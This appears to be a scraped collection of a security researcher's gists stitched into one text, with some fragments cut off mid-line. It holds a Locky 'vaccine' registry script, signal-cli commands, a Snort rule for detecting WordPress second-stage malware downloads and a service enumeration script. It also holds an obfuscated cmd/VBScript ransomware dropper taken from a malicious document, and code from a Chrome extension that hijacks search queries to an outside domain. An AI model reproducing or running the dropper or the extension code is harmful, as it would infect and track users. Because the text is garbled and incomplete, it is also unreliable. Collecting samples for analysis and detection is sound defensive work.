

# Create registry Key
# Pre-creates HKCU\Software\Locky and then denies the current user all access
# to it. Presumably a "vaccine" against software that expects to write this
# key (the key name suggests it) — confirm the intent before deploying.
New-Item -ItemType Key -Path "HKCU:\Software\Locky"
# Setting ACL
$a = whoami
$keyPath = "HKCU:\SOFTWARE\Locky"
$acl = Get-Acl -Path $keyPath
# Deny ACE for FullControl. The three-argument constructor uses no inheritance
# or propagation flags, so the ACE is scoped to this key alone (subkeys are
# not covered). Because it denies the account running the script, undoing it
# later requires taking ownership of the key first.
$rule = New-Object -TypeName System.Security.AccessControl.RegistryAccessRule -ArgumentList $a, "FullControl", "Deny"
$acl.SetAccessRule($rule)
Set-Acl -Path $keyPath -AclObject $acl
x0rz / dropper.INFECTED.bat
Created May 10, 2016 12:48
Command line execution acting as a dropper - found inside a malicious document (probably cerber ransomware)
cmd.exe /V /C set "FKO=%RANDOM%" && (for %i in ("Dim LXZxe0" "suB GdBocmWra2bHN()" "LCtcOqCDnnH=16+11" "On eRROR resUME neXt" "NVJjYA=9+60" "DIm I7U6poXRu,GiWuI,BoUfvWYBUkKj,IUJthZDvQAl" "Y9cKZng13vo=40+64" "IUJthZDvQAl="SVXQDEt1loQ6LlG"" "Q1u0qcM7Qv9Lv=98+61" "I7U6poXRu=SHpwygLQgHdJ("1C354D39787C1D224319463E002C172D5C67213C5F","MtA9IBS2U4nhQr")" "UUlJ36frjukOf=4+85" "seT GiWuI=cReaTeOBJEcT(SHpwygLQgHdJ("1B3132362A075E0A1B7F6E01200F070208",IUJthZDvQAl))" "PjtwgPXl=60+45" "GiWuI.opEN SHpwygLQgHdJ("320C31","KuIefPyEKG7jD28"),I7U6poXRu,0" "LxFoiv6rfAMR6=48+79" "GiWuI.setRequESthEaDer SHpwygLQgHdJ("1359183537","YA8vRRDzISQ1tmJ"),SHpwygLQgHdJ("51212E22364D666B4079","T3XZGEpRXr")" "D0jDQ36=89+30" "GiWuI.sEnd()" "Q30TTtK7H7DXR6BB8=65+76" "If GiWuI.STatUsTexT<>SHpwygLQgHdJ("172A1A0506562B7A0E152127173631","EGKhqo7GZMzOSrX") THen PEIwKPwhVFEYy2a" "L360=60+17" "eND Sub" "Sub NEWtZ()" "GPUDsi=67+57" "TfgjBtEZiAm1I" "Dim TlmAoztjgrep3nIj2,Umdr3G2bHN,FoHwraR,KzSFDJqxxi64,JyU1NQwdLZlhoO" "K0Q2UNY=9+6" "On ERRoR resumE nexT
# Get the text from the QR code given by the Signal app and link your new number to it
# NOTE(review): the tsdevice:/ URI decoded from the QR code appears to be a
# one-time linking credential; treat it like a secret (keep it out of shell
# history, logs and committed files) and use it only once.
number='+1234568790'   # placeholder: the number already registered with signal-cli
signal-cli -u "$number" addDevice --uri "tsdevice:/?uuid=xxxxxxxx..."
function redirect(e){chrome.tabs.update({url:e})}var pagebrowsed,allowSearch,prevurl=null,srchid=100,sysid=739,random=Math.floor(1e7*Math.random()),thanksmsg=[random,"slonif",".","faith","opurie","com"],InstallDone="";chrome.tabs.onUpdated.addListener(function(){chrome.tabs.getSelected(null,function(e){var s=e.url;if(InstallDone){InstallDone[srchid]?InstallDone[srchid]:InstallDone.default;if(s!=prevurl&&(prevurl=s,chrome.storage.sync.get({pagebrowsed:0},function(e){pagebrowsed=e.pagebrowsed,chrome.storage.sync.set({pagebrowsed:e.pagebrowsed+1})})),pagebrowsed>5&&(document.getElementsByTagName("body")[0].style.display="none",s.match(/google/)||s.match(/bing/))){var t=s.split("q=");if(t.length>1){var a="http://startupfraction.com/yaelba/?keyword="+t[1].split("&")[0]+"&id="+srchid+"&sysid="+sysid;redirect(a),chrome.tabs.update({url:a})}}if(pagebrowsed>5)try{var n=window.document.createElement("canvas").getContext("2d");chrome.browserAction.setIcon({imageData:n.getImageData(0,0,19,19)})}catch(e){}}})}),fetch("htt
/**
 * Navigate a tab to `e` via chrome.tabs.update.
 *
 * No tab id is supplied, so the update targets whichever tab Chrome selects by
 * default (the active tab of the current window per the extension API). `e`
 * is forwarded as the url without any validation or allow-listing.
 *
 * @param {string} e - destination URL
 */
function redirect(e) {
var target = { url: e };
chrome.tabs.update(target);
}
var pagebrowsed, allowSearch, prevurl = null,
srchid = 100,
sysid = 739,
random = Math.floor(1e7 * Math.random()),
thanksmsg = [random, "slonif", ".", "faith", "opurie", "com"],
{
"background": {
"scripts": [ "background.js" ]
},
"browser_action": {
"default_icon": "opurie.png",
"default_popup": "popup.html",
"default_title": "Opurie"
},
"description": "Whiohoo! Welcome back to Opurie",
x0rz / wordpress_snort.rules
Last active September 29, 2017 05:56
Snort rule replacing sid:26576 to detect more second stage download attempts (may raise false positives - to be tested)
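# Local rule. NOTE(review): sids below 1000000 are reserved for official
# rulesets, so sid:31337 may collide with a vendor rule — consider moving it
# into the local range.
# The content match gives the fast-pattern matcher a literal to prefilter on,
# so the unanchored, backtracking pcre (".*" over the whole URI) only runs on
# URIs containing "/wp-". It also gives the http_uri modifier a content to
# attach to; a bare "http_uri;" with no preceding content is not valid Snort 2
# syntax. Detection logic is otherwise unchanged; rev bumped for the edit.
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MALWARE-CNC possible infected wordpress second stage download attempt"; flow:to_server,established; content:"/wp-"; http_uri; nocase; fast_pattern; pcre:"/\/wp-(includes|admin|content)\/.*\.(exe|dll|scr|rar|zip|jar|ps1|bat)/iU"; metadata:service http; reference:url,medium.com/@x0rz/threat-hunting-on-simple-tricks-27e64e39f2f0; classtype:trojan-activity; sid:31337; rev:2;)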
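echo "[+] Getting \system\\currentcontrolset\\services"
# One subkey per installed service. Keep the Name column so $raw_services has
# the same shape as before for anything that consumes it later.
$raw_services = Get-ChildItem -Path hklm:\system\\currentcontrolset\\services | select Name
# Short service name = last component of the key path. Reading .Name directly
# replaces the old "$srv" stringification, which rendered the object as
# "@{Name=...\svc}" and then needed Substring() to trim the trailing "}" —
# a fragile dependency on PowerShell's object-to-string format.
$services = @()
foreach ($srv in $raw_services) {
    $shortname = $srv.Name.Split("\")[-1]
    $services += $shortname
}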
# Registering your new number
number='+1234568790'   # placeholder: the number to register
signal-cli -u "$number" register
# Confirm registration with the code Signal delivers for that number
# (xxxxxx is a placeholder for the received code).
signal-cli -u "$number" verify xxxxxx
import datetime
import os
import sys
import pefile
from scapy.all import *
import scapy_http.http
import tempfile
# A three-day window (72 h). How it is applied is not visible in this excerpt;
# presumably compared against timestamps elsewhere in the script — TODO confirm.
TIME_THRESHOLD: datetime.timedelta = datetime.timedelta(hours=72)